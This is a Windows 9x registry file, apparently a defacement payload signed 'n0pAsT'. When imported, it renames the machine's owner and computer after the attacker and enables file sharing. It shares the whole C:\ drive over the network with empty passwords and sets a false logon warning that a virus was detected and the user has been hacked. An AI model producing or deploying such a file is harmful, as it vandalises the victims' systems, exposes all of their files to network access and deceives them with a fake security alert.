REGEDIT4

[HKEY_LOCAL_MACHINE\Network\Logon]
"PrimaryProvider"="Microsoft Network"
"LMLogon"=hex:00,00,00,00
"username"="n0pAsT"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
"RegisteredOwner"="n0pAsT"
"RegisteredOrganization"="n0pAsT"
"Version"="WinblOz 85"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\ComputerName]
"ComputerName"="n0pAsT"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP]
"FileSharing"="Yes"
"PrintSharing"="No"
"ComputerName"="n0pAsT"
"Workgroup"="HackinG"
"Comment"="hacked by n0pAsT"
"MaintainServerList"="2"
"LMAnnounce"="0"
"StaticVxD"="vnetsup.vxd"
"Start"=hex:00
"NetClean"=hex:01

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"="n0pAsT fait de la rébellion! "
"LegalNoticeText"="Windows vient de détecter un virus. Veuillez contacter un technicien en leur précisant que vous vous êtes fais piraté par n0pAsT."

[HKEY_USERS\.Default\Software\Soquets3]
"Passworld"="Passworld WRONG"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C]
"Flags"=dword:00000101
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"="HD cracked by n0pAsT"